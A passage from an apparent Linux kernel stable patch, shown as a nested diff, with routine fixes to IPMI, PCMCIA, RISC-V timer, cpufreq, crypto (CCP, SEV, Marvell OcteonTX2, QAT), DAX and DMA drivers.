+ 	timer_setup(&ssif_info->retry_timer, retry_timeout, 0);
+ 	timer_setup(&ssif_info->watch_timer, watch_timeout, 0);
+ 
+diff --git a/drivers/char/pcmcia/cm4000_cs.c b/drivers/char/pcmcia/cm4000_cs.c
+index adaec8fd4b16c..e656f42a28ac2 100644
+--- a/drivers/char/pcmcia/cm4000_cs.c
++++ b/drivers/char/pcmcia/cm4000_cs.c
+@@ -529,7 +529,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			DEBUGP(5, dev, "NumRecBytes is valid\n");
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* can not sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 	if (i == 100) {
+ 		DEBUGP(5, dev, "Timeout waiting for NumRecBytes getting "
+@@ -549,7 +550,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			}
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* can not sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 
+ 	/* check whether it is a short PTS reply? */
+diff --git a/drivers/clocksource/timer-riscv.c b/drivers/clocksource/timer-riscv.c
+index a0d66fabf0732..a01c2bd241349 100644
+--- a/drivers/clocksource/timer-riscv.c
++++ b/drivers/clocksource/timer-riscv.c
+@@ -177,6 +177,11 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		return error;
+ 	}
+ 
++	if (riscv_isa_extension_available(NULL, SSTC)) {
++		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
++		static_branch_enable(&riscv_sstc_available);
++	}
++
+ 	error = cpuhp_setup_state(CPUHP_AP_RISCV_TIMER_STARTING,
+ 			 "clockevents/riscv/timer:starting",
+ 			 riscv_timer_starting_cpu, riscv_timer_dying_cpu);
+@@ -184,11 +189,6 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		pr_err("cpu hp setup state failed for RISCV timer [%d]\n",
+ 		       error);
+ 
+-	if (riscv_isa_extension_available(NULL, SSTC)) {
+-		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
+-		static_branch_enable(&riscv_sstc_available);
+-	}
+-
+ 	return error;
+ }
+ 
+diff --git a/drivers/cpufreq/davinci-cpufreq.c b/drivers/cpufreq/davinci-cpufreq.c
+index 9e97f60f81996..ebb3a81026816 100644
+--- a/drivers/cpufreq/davinci-cpufreq.c
++++ b/drivers/cpufreq/davinci-cpufreq.c
+@@ -133,12 +133,14 @@ static int __init davinci_cpufreq_probe(struct platform_device *pdev)
+ 
+ static int __exit davinci_cpufreq_remove(struct platform_device *pdev)
+ {
++	cpufreq_unregister_driver(&davinci_driver);
++
+ 	clk_put(cpufreq.armclk);
+ 
+ 	if (cpufreq.asyncclk)
+ 		clk_put(cpufreq.asyncclk);
+ 
+-	return cpufreq_unregister_driver(&davinci_driver);
++	return 0;
+ }
+ 
+ static struct platform_driver davinci_cpufreq_driver = {
+diff --git a/drivers/cpuidle/Kconfig.arm b/drivers/cpuidle/Kconfig.arm
+index 747aa537389b9..f0714a32921e6 100644
+--- a/drivers/cpuidle/Kconfig.arm
++++ b/drivers/cpuidle/Kconfig.arm
+@@ -102,6 +102,7 @@ config ARM_MVEBU_V7_CPUIDLE
+ config ARM_TEGRA_CPUIDLE
+ 	bool "CPU Idle Driver for NVIDIA Tegra SoCs"
+ 	depends on (ARCH_TEGRA || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARCH_NEEDS_CPU_IDLE_COUPLED if SMP
+ 	select ARM_CPU_SUSPEND
+ 	help
+@@ -110,6 +111,7 @@ config ARM_TEGRA_CPUIDLE
+ config ARM_QCOM_SPM_CPUIDLE
+ 	bool "CPU Idle Driver for Qualcomm Subsystem Power Manager (SPM)"
+ 	depends on (ARCH_QCOM || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARM_CPU_SUSPEND
+ 	select CPU_IDLE_MULTIPLE_DRIVERS
+ 	select DT_IDLE_STATES
+diff --git a/drivers/crypto/amcc/crypto4xx_core.c b/drivers/crypto/amcc/crypto4xx_core.c
+index 280f4b0e71334..50dc783821b69 100644
+--- a/drivers/crypto/amcc/crypto4xx_core.c
++++ b/drivers/crypto/amcc/crypto4xx_core.c
+@@ -522,7 +522,6 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ {
+ 	struct skcipher_request *req;
+ 	struct scatterlist *dst;
+-	dma_addr_t addr;
+ 
+ 	req = skcipher_request_cast(pd_uinfo->async_req);
+ 
+@@ -531,8 +530,8 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ 					  req->cryptlen, req->dst);
+ 	} else {
+ 		dst = pd_uinfo->dest_va;
+-		addr = dma_map_page(dev->core_dev->device, sg_page(dst),
+-				    dst->offset, dst->length, DMA_FROM_DEVICE);
++		dma_unmap_page(dev->core_dev->device, pd->dest, dst->length,
++			       DMA_FROM_DEVICE);
+ 	}
+ 
+ 	if (pd_uinfo->sa_va->sa_command_0.bf.save_iv == SA_SAVE_IV) {
+@@ -557,10 +556,9 @@ static void crypto4xx_ahash_done(struct crypto4xx_device *dev,
+ 	struct ahash_request *ahash_req;
+ 
+ 	ahash_req = ahash_request_cast(pd_uinfo->async_req);
+-	ctx  = crypto_tfm_ctx(ahash_req->base.tfm);
++	ctx = crypto_ahash_ctx(crypto_ahash_reqtfm(ahash_req));
+ 
+-	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo,
+-				     crypto_tfm_ctx(ahash_req->base.tfm));
++	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo, ctx);
+ 	crypto4xx_ret_sg_desc(dev, pd_uinfo);
+ 
+ 	if (pd_uinfo->state & PD_ENTRY_BUSY)
+diff --git a/drivers/crypto/ccp/ccp-dmaengine.c b/drivers/crypto/ccp/ccp-dmaengine.c
+index 9f753cb4f5f18..b386a7063818b 100644
+--- a/drivers/crypto/ccp/ccp-dmaengine.c
++++ b/drivers/crypto/ccp/ccp-dmaengine.c
+@@ -642,14 +642,26 @@ static void ccp_dma_release(struct ccp_device *ccp)
+ 		chan = ccp->ccp_dma_chan + i;
+ 		dma_chan = &chan->dma_chan;
+ 
+-		if (dma_chan->client_count)
+-			dma_release_channel(dma_chan);
+-
+ 		tasklet_kill(&chan->cleanup_tasklet);
+ 		list_del_rcu(&dma_chan->device_node);
+ 	}
+ }
+ 
++static void ccp_dma_release_channels(struct ccp_device *ccp)
++{
++	struct ccp_dma_chan *chan;
++	struct dma_chan *dma_chan;
++	unsigned int i;
++
++	for (i = 0; i < ccp->cmd_q_count; i++) {
++		chan = ccp->ccp_dma_chan + i;
++		dma_chan = &chan->dma_chan;
++
++		if (dma_chan->client_count)
++			dma_release_channel(dma_chan);
++	}
++}
++
+ int ccp_dmaengine_register(struct ccp_device *ccp)
+ {
+ 	struct ccp_dma_chan *chan;
+@@ -770,8 +782,9 @@ void ccp_dmaengine_unregister(struct ccp_device *ccp)
+ 	if (!dmaengine)
+ 		return;
+ 
+-	ccp_dma_release(ccp);
++	ccp_dma_release_channels(ccp);
+ 	dma_async_device_unregister(dma_dev);
++	ccp_dma_release(ccp);
+ 
+ 	kmem_cache_destroy(ccp->dma_desc_cache);
+ 	kmem_cache_destroy(ccp->dma_cmd_cache);
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 06fc7156c04f3..3e583f0324874 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -26,6 +26,7 @@
+ #include <linux/fs_struct.h>
+ 
+ #include <asm/smp.h>
++#include <asm/cacheflush.h>
+ 
+ #include "psp-dev.h"
+ #include "sev-dev.h"
+@@ -881,7 +882,14 @@ static int sev_ioctl_do_get_id2(struct sev_issue_cmd *argp)
+ 	input_address = (void __user *)input.address;
+ 
+ 	if (input.address && input.length) {
+-		id_blob = kzalloc(input.length, GFP_KERNEL);
++		/*
++		 * The length of the ID shouldn't be assumed by software since
++		 * it may change in the future.  The allocation size is limited
++		 * to 1 << (PAGE_SHIFT + MAX_ORDER - 1) by the page allocator.
++		 * If the allocation fails, simply return ENOMEM rather than
++		 * warning in the kernel log.
++		 */
++		id_blob = kzalloc(input.length, GFP_KERNEL | __GFP_NOWARN);
+ 		if (!id_blob)
+ 			return -ENOMEM;
+ 
+@@ -1327,7 +1335,10 @@ void sev_pci_init(void)
+ 
+ 	/* Obtain the TMR memory area for SEV-ES use */
+ 	sev_es_tmr = sev_fw_alloc(SEV_ES_TMR_SIZE);
+-	if (!sev_es_tmr)
++	if (sev_es_tmr)
++		/* Must flush the cache before giving it to the firmware */
++		clflush_cache_range(sev_es_tmr, SEV_ES_TMR_SIZE);
++	else
+ 		dev_warn(sev->dev,
+ 			 "SEV: TMR allocation failed, SEV-ES support unavailable\n");
+ 
+diff --git a/drivers/crypto/hisilicon/sgl.c b/drivers/crypto/hisilicon/sgl.c
+index 2b6f2281cfd6c..0974b00414050 100644
+--- a/drivers/crypto/hisilicon/sgl.c
++++ b/drivers/crypto/hisilicon/sgl.c
+@@ -124,9 +124,8 @@ err_free_mem:
+ 	for (j = 0; j < i; j++) {
+ 		dma_free_coherent(dev, block_size, block[j].sgl,
+ 				  block[j].sgl_dma);
+-		memset(block + j, 0, sizeof(*block));
+ 	}
+-	kfree(pool);
++	kfree_sensitive(pool);
+ 	return ERR_PTR(-ENOMEM);
+ }
+ EXPORT_SYMBOL_GPL(hisi_acc_create_sgl_pool);
+diff --git a/drivers/crypto/marvell/octeontx2/Makefile b/drivers/crypto/marvell/octeontx2/Makefile
+index 965297e969546..f0f2942c1d278 100644
+--- a/drivers/crypto/marvell/octeontx2/Makefile
++++ b/drivers/crypto/marvell/octeontx2/Makefile
+@@ -1,11 +1,10 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptpf.o rvu_cptvf.o
++obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptcommon.o rvu_cptpf.o rvu_cptvf.o
+ 
++rvu_cptcommon-objs := cn10k_cpt.o otx2_cptlf.o otx2_cpt_mbox_common.o
+ rvu_cptpf-objs := otx2_cptpf_main.o otx2_cptpf_mbox.o \
+-		  otx2_cpt_mbox_common.o otx2_cptpf_ucode.o otx2_cptlf.o \
+-		  cn10k_cpt.o otx2_cpt_devlink.o
+-rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o otx2_cptlf.o \
+-		  otx2_cpt_mbox_common.o otx2_cptvf_reqmgr.o \
+-		  otx2_cptvf_algs.o cn10k_cpt.o
++		  otx2_cptpf_ucode.o otx2_cpt_devlink.o
++rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o \
++		  otx2_cptvf_reqmgr.o otx2_cptvf_algs.o
+ 
+ ccflags-y += -I$(srctree)/drivers/net/ethernet/marvell/octeontx2/af
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+index 1499ef75b5c22..93d22b3289919 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+@@ -7,6 +7,9 @@
+ #include "otx2_cptlf.h"
+ #include "cn10k_cpt.h"
+ 
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf);
++
+ static struct cpt_hw_ops otx2_hw_ops = {
+ 	.send_cmd = otx2_cpt_send_cmd,
+ 	.cpt_get_compcode = otx2_cpt_get_compcode,
+@@ -19,8 +22,8 @@ static struct cpt_hw_ops cn10k_hw_ops = {
+ 	.cpt_get_uc_compcode = cn10k_cpt_get_uc_compcode,
+ };
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf)
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf)
+ {
+ 	void __iomem *lmtline = lf->lmtline;
+ 	u64 val = (lf->slot & 0x7FF);
+@@ -68,6 +71,7 @@ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptpf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ {
+@@ -91,3 +95,4 @@ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptvf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+index c091392b47e0f..aaefc7e38e060 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+@@ -28,8 +28,6 @@ static inline u8 otx2_cpt_get_uc_compcode(union otx2_cpt_res_s *result)
+ 	return ((struct cn9k_cpt_res_s *)result)->uc_compcode;
+ }
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf);
+ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf);
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+index 5012b7e669f07..6019066a6451a 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+@@ -145,8 +145,6 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox,
+ 				  struct pci_dev *pdev);
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr);
+ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			      u64 reg, u64 val, int blkaddr);
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+index a317319696eff..115997475beb3 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+@@ -19,6 +19,7 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+@@ -36,14 +37,17 @@ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_ready_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_af_reg_requests, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr)
++static int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox,
++				    struct pci_dev *pdev, u64 reg,
++				    u64 *val, int blkaddr)
+ {
+ 	struct cpt_rd_wr_reg_msg *reg_msg;
+ 
+@@ -91,6 +95,7 @@ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_add_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			 u64 reg, u64 *val, int blkaddr)
+@@ -103,6 +108,7 @@ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_read_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			  u64 reg, u64 val, int blkaddr)
+@@ -115,6 +121,7 @@ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_attach_rscrs_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -170,6 +177,7 @@ int otx2_cpt_detach_rsrcs_msg(struct otx2_cptlfs_info *lfs)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_detach_rsrcs_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -202,6 +210,7 @@ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_msix_offset_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ {
+@@ -216,3 +225,4 @@ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ 
+ 	return otx2_mbox_check_rsp_msgs(mbox, 0);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_sync_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index c8350fcd60fab..71e5f79431afa 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -274,6 +274,8 @@ void otx2_cptlf_unregister_interrupts(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	cptlf_disable_intrs(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_unregister_interrupts,
++		     CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ static int cptlf_do_register_interrrupts(struct otx2_cptlfs_info *lfs,
+ 					 int lf_num, int irq_offset,
+@@ -321,6 +323,7 @@ free_irq:
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_register_interrupts, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -334,6 +337,7 @@ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ 		free_cpumask_var(lfs->lf[slot].affinity_mask);
+ 	}
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_free_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_set_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -366,6 +370,7 @@ free_affinity_mask:
+ 	otx2_cptlf_free_irqs_affinity(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_set_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 		    int lfs_num)
+@@ -422,6 +427,7 @@ clear_lfs_num:
+ 	lfs->lfs_num = 0;
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+@@ -431,3 +437,8 @@ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
++
++MODULE_AUTHOR("Marvell");
++MODULE_DESCRIPTION("Marvell RVU CPT Common module");
++MODULE_LICENSE("GPL");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+index a402ccfac5577..ddf6e913c1c45 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+@@ -831,6 +831,8 @@ static struct pci_driver otx2_cpt_pci_driver = {
+ 
+ module_pci_driver(otx2_cpt_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION(OTX2_CPT_DRV_STRING);
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 3411e664cf50c..392e9fee05e81 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -429,6 +429,8 @@ static struct pci_driver otx2_cptvf_pci_driver = {
+ 
+ module_pci_driver(otx2_cptvf_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION("Marvell RVU CPT Virtual Function Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index b4b9f0aa59b98..b61ada5591586 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -435,8 +435,8 @@ static void qat_alg_skcipher_init_com(struct qat_alg_skcipher_ctx *ctx,
+ 	} else if (aes_v2_capable && mode == ICP_QAT_HW_CIPHER_CTR_MODE) {
+ 		ICP_QAT_FW_LA_SLICE_TYPE_SET(header->serv_specif_flags,
+ 					     ICP_QAT_FW_LA_USE_UCS_SLICE_TYPE);
+-		keylen = round_up(keylen, 16);
+ 		memcpy(cd->ucs_aes.key, key, keylen);
++		keylen = round_up(keylen, 16);
+ 	} else {
+ 		memcpy(cd->aes.key, key, keylen);
+ 	}
+diff --git a/drivers/crypto/ux500/Kconfig b/drivers/crypto/ux500/Kconfig
+index dcbd7404768f1..ac89cd2de12a1 100644
+--- a/drivers/crypto/ux500/Kconfig
++++ b/drivers/crypto/ux500/Kconfig
+@@ -15,8 +15,7 @@ config CRYPTO_DEV_UX500_HASH
+ 	  Depends on UX500/STM DMA if running in DMA mode.
+ 
+ config CRYPTO_DEV_UX500_DEBUG
+-	bool "Activate ux500 platform debug-mode for crypto and hash block"
+-	depends on CRYPTO_DEV_UX500_CRYP || CRYPTO_DEV_UX500_HASH
++	bool "Activate debug-mode for UX500 crypto driver for HASH block"
++	depends on CRYPTO_DEV_UX500_HASH
+ 	help
+-	  Say Y if you want to add debug prints to ux500_hash and
+-	  ux500_cryp devices.
++	  Say Y if you want to add debug prints to ux500_hash devices.
+diff --git a/drivers/cxl/pmem.c b/drivers/cxl/pmem.c
+index 08bbbac9a6d08..71cfa1fdf9027 100644
+--- a/drivers/cxl/pmem.c
++++ b/drivers/cxl/pmem.c
+@@ -76,6 +76,7 @@ static int cxl_nvdimm_probe(struct device *dev)
+ 		return rc;
+ 
+ 	set_bit(NDD_LABELING, &flags);
++	set_bit(NDD_REGISTER_SYNC, &flags);
+ 	set_bit(ND_CMD_GET_CONFIG_SIZE, &cmd_mask);
+ 	set_bit(ND_CMD_GET_CONFIG_DATA, &cmd_mask);
+ 	set_bit(ND_CMD_SET_CONFIG_DATA, &cmd_mask);
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index 1dad813ee4a69..c64e7076537cb 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -427,8 +427,8 @@ static void unregister_dev_dax(void *dev)
+ 	dev_dbg(dev, "%s\n", __func__);
+ 
+ 	kill_dev_dax(dev_dax);
+-	free_dev_dax_ranges(dev_dax);
+ 	device_del(dev);
++	free_dev_dax_ranges(dev_dax);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4852a2dbdb278..4aa758a2b3d1b 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -146,7 +146,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 		if (rc) {
+ 			dev_warn(dev, "mapping%d: %#llx-%#llx memory add failed\n",
+ 					i, range.start, range.end);
+-			release_resource(res);
++			remove_resource(res);
+ 			kfree(res);
+ 			data->res[i] = NULL;
+ 			if (mapped)
+@@ -195,7 +195,7 @@ static void dev_dax_kmem_remove(struct dev_dax *dev_dax)
+ 
+ 		rc = remove_memory(range.start, range_len(&range));
+ 		if (rc == 0) {
+-			release_resource(data->res[i]);
++			remove_resource(data->res[i]);
+ 			kfree(data->res[i]);
+ 			data->res[i] = NULL;
+ 			success++;
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index b6d48d54f42fc..7b95f07c6f1af 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -245,7 +245,7 @@ config FSL_RAID
+ 
+ config HISI_DMA
+ 	tristate "HiSilicon DMA Engine support"
+-	depends on ARM64 || COMPILE_TEST
++	depends on ARCH_HISI || COMPILE_TEST
+ 	depends on PCI_MSI
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index bf85aa0979ecb..152c5d98524d7 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -325,8 +325,6 @@ dma_chan_tx_status(struct dma_chan *dchan, dma_cookie_t cookie,
+ 		len = vd_to_axi_desc(vdesc)->hw_desc[0].len;
+ 		completed_length = completed_blocks * len;
+ 		bytes = length - completed_length;
+-	} else {
+-		bytes = vd_to_axi_desc(vdesc)->length;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index c54b24ff5206a..52bdf04aff511 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -455,6 +455,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			} else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->dar = dst_addr;
+ 			}
+ 		} else {
+ 			burst->dar = dst_addr;
+@@ -470,6 +472,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			}  else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->sar = src_addr;
+ 			}
+ 		}
+ 
+diff --git a/drivers/dma/dw-edma/dw-edma-v0-core.c b/drivers/dma/dw-edma/dw-edma-v0-core.c
+index 77e6cfe52e0a3..a3816ba632851 100644
+--- a/drivers/dma/dw-edma/dw-edma-v0-core.c
++++ b/drivers/dma/dw-edma/dw-edma-v0-core.c
+@@ -192,7 +192,7 @@ static inline void writeq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ static inline u64 readq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ 			   const void __iomem *addr)
+ {
+-	u32 value;
++	u64 value;
+ 
+ 	if (dw->chip->mf == EDMA_MF_EDMA_LEGACY) {
+ 		u32 viewport_sel;
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 29dbb0f52e186..8b4573dc7ecc5 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -701,7 +701,7 @@ static void idxd_groups_clear_state(struct idxd_device *idxd)
+ 		group->use_rdbuf_limit = false;
+ 		group->rdbufs_allowed = 0;
+ 		group->rdbufs_reserved = 0;
